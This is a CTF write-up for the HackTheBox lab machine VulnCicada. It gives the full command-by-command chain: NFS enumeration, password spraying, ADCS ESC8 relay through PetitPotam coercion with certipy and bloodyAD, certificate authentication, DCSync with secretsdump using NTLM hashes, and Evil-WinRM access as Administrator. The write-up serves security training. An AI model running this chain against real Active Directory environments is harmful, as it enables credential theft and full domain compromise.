HTB VulnCicada CTF Writeup
Medium-rated Windows Active Directory box. NFS exposes files leading to a password-sprayed foothold. PetitPotam coerces DC authentication to a relay server, exploiting ADCS ESC8 to issue a certificate for DCSync and full domain compromise.
HTB VulnCicada CTF
Summary
VulnCicada is a Windows Active Directory machine on HackTheBox. An NFS share (/profiles) accessible to everyone exposes user profile directories and a screenshot containing a cleartext password on a sticky note. Password spraying with this credential against the enumerated usernames yields access as Rosie.Powell. With domain credentials, BloodHound enumeration reveals no direct privilege escalation paths, but certipy identifies the ADCS environment as vulnerable to ESC8 (HTTP-based Web Enrollment). Exploitation involves adding a DNS record via bloodyAD (leveraging the default Machine Account Quota), then using certipy’s relay mode to intercept coerced NTLM authentication from the DC (triggered via PetitPotam through NetExec’s coerce_plus module) and request a DomainController certificate. The resulting PFX authenticates as the DC machine account, whose NTLM hash is used to perform a DCSync attack with secretsdump.py, dumping the Administrator hash and granting full domain access via Evil-WinRM.
Service Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-11-21 12:38:13Z)
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-21T11:01:09
| Not valid after: 2026-11-21T11:01:09
| MD5: 062be88241bfd43e3899f8b31aa85280
| SHA-1: 499326b73a9b0ad86889929f855c4e1b494fe6ec
| -----BEGIN CERTIFICATE-----
| MII[SNIP]Pg==
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-21T11:01:09
| Not valid after: 2026-11-21T11:01:09
| MD5: 062be88241bfd43e3899f8b31aa85280
| SHA-1: 499326b73a9b0ad86889929f855c4e1b494fe6ec
| -----BEGIN CERTIFICATE-----
| MII[SNIP]Pg==
|_-----END CERTIFICATE-----
2049/tcp open mountd syn-ack 1-3 (RPC #100005)
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-21T11:01:09
| Not valid after: 2026-11-21T11:01:09
| MD5: 062be88241bfd43e3899f8b31aa85280
| SHA-1: 499326b73a9b0ad86889929f855c4e1b494fe6ec
| -----BEGIN CERTIFICATE-----
| MII[SNIP]Pg==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-21T11:01:09
| Not valid after: 2026-11-21T11:01:09
| MD5: 062be88241bfd43e3899f8b31aa85280
| SHA-1: 499326b73a9b0ad86889929f855c4e1b494fe6ec
| -----BEGIN CERTIFICATE-----
| MII[SNIP]Pg==
|_-----END CERTIFICATE-----
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2025-11-21T12:39:50+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Issuer: commonName=DC-JPQ225.cicada.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-20T11:08:45
| Not valid after: 2026-05-22T11:08:45
| MD5: 81d21f14c1f8c89e5bc11f021549359a
| SHA-1: e0c517136684645a38cb105de242817a9441df26
| -----BEGIN CERTIFICATE-----
| MII[SNIP]3u0
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
54116/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
54117/tcp open msrpc syn-ack Microsoft Windows RPC
54134/tcp open msrpc syn-ack Microsoft Windows RPC
54204/tcp open msrpc syn-ack Microsoft Windows RPC
55815/tcp open msrpc syn-ack Microsoft Windows RPC
56055/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows
NFS Enumeration
The machine has a open share:
1
2
3
4
$ showmount -e DC-JPQ225
Export list for DC-JPQ225:
/profiles (everyone)
I mount the share locally:
1
sudo mount -t nfs DC-JPQ225:/profiles ./mount/
I list files in the mount to find possible users:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# ls -la mount/
total 14
drwxrwxrwx 2 nobody nogroup 4096 Jun 3 07:21 .
drwxr-xr-x 4 user user 4096 Nov 21 08:12 ..
drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 Administrator
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Daniel.Marshall
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Debra.Wright
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Jane.Carter
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Jordan.Francis
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Joyce.Andrews
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Katie.Ward
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Megan.Simpson
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Richard.Gibbons
drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 Rosie.Powell
drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 Shirley.West
I save users.txt:
1
2
3
4
5
6
7
8
9
10
Daniel.Marshall
Debra.Wright
Jane.Carter
Jordan.Francis
Joyce.Andrews
Katie.Ward
Megan.Simpson
Richard.Gibbons
Rosie.Powell
Shirley.West
I locate files in the nfs share:
1
find mount/ -type f
It locates two image files:
1
2
mount/Rosie.Powell/marketing.png
mount/Administrator/vacation.png
I open marketing.png to find a password written in a sticky note:
I write it down to “passwords.txt”:
1
Cicada123
Password Spraying
I password spray the new password:
1
nxc smb 10.129.234.48 -u users.txt -p passwords.txt --continue-on-success -k
Among the output, I see the password is valid for Rosie.Powell. I also notice how the error message for Shirley.West is different from the usual KDC_ERR_PREAUTH_FAILED:
1
2
SMB 10.129.234.48 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
SMB 10.129.234.48 445 DC-JPQ225 [-] cicada.vl\Shirley.West:Cicada123 KDC_ERR_CLIENT_REVOKED
Kerberos Configuration
I do use netexec to generate a proper krb5.conf file:
1
nxc smb 10.129.234.48 -u rosie.powell -p Cicada123 -k --generate-krb5-file krb5.conf
This is how it looks like:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = CICADA.VL
[realms]
CICADA.VL = {
kdc = dc-jpq225.cicada.vl
admin_server = dc-jpq225.cicada.vl
default_domain = cicada.vl
}
[domain_realm]
.cicada.vl = CICADA.VL
cicada.vl = CICADA.VL
Then I move it its proper directory, /etc/:
1
sudo mv krb5.conf /etc/
I get a TGT for rosie.powell:
1
getTGT.py cicada.vl/[email protected]
I rename it:
1
mv rosie.powell\@DC-JPQ225.cicada.vl.ccache rosie.powell.ccache
And export to the variable:
1
export KRB5CCNAME=./rosie.powell.ccache
LDAP Server Enumeration with Bloodhound
I use rusthound-ce to collect data about the domain
1
rusthound-ce -d cicada.vl -k -z -f DC-JPQ225.cicada.vl -c All
It returns me the zip file with the domain information. I ingest it in bloodhound, and take a look at it, but can’t find much.
ADCS Enumeration
Considering I was running out of options, I started enumerating ADCS.
1
certipy find -vulnerable -k -u [email protected] -p Cicada123 -dc-host dc-jpq225.cicada.vl -dc-ip 10.129.234.48
It saves a json file output to my CWD. I open it, and it tells me the ADCS environment is vulnerable to ESC8.
1
2
3
"[!] Vulnerabilities": {
"ESC8": "Web Enrollment is enabled over HTTP."
}
ADCS ESC8 Exploitation
I follow certipy’s wiki on ESC8 exploitation to understand how to exploit the vulnerability. I can add a DNS record to the dns server since the Machine Accont Quota is set to 10:
1
bloodyAD.py -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.57
I start certipy relay:
1
certipy relay -target http://10.129.234.48/ -template DomainController
Then coerce authentication with NetExec’s coerce_plus module:
1
nxc smb dc-jpq225.cicada.vl -k -u rosie.powell -p Cicada123 -M coerce_plus -o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PetitPotam
It works:
This works because the DC first tries using kerberos (which is unsupported), then tries using NTLM. The same attack could be performed using krbrelayx, if, for instance, NTLM authentication was disabled entirely:
1
python3 krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/ --template DomainController --adcs -dc-ip 10.129.234.48
It would work with this certificate generated from krbrelayx:
1
certipy auth -pfx unknown6053.pfx -dc-ip 10.129.234.48
And it would also work with the one generated via certipy itself:
1
certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.234.48
Now I can use the NTLM hash for the DC machine account to perform a DCSYNC attack with secretsdump.py:
1
secretsdump.py -hashes :a65952c664e9cf5de60195626edbeee3 'cicada.vl/[email protected]' -k
Get a TGT for Administrator:
1
getTGT.py cicada.vl/administrator -hashes :85a0da53871a9d56b6cd05deda3a5e87
Connect via WINRM as Administrator (this needs /etc/krb5.conf set up properly):
1
evil-winrm -r CICADA.VL -u administrator -i dc-jpq225.cicada.vl
Flags are in C:\users\administrator\desktop






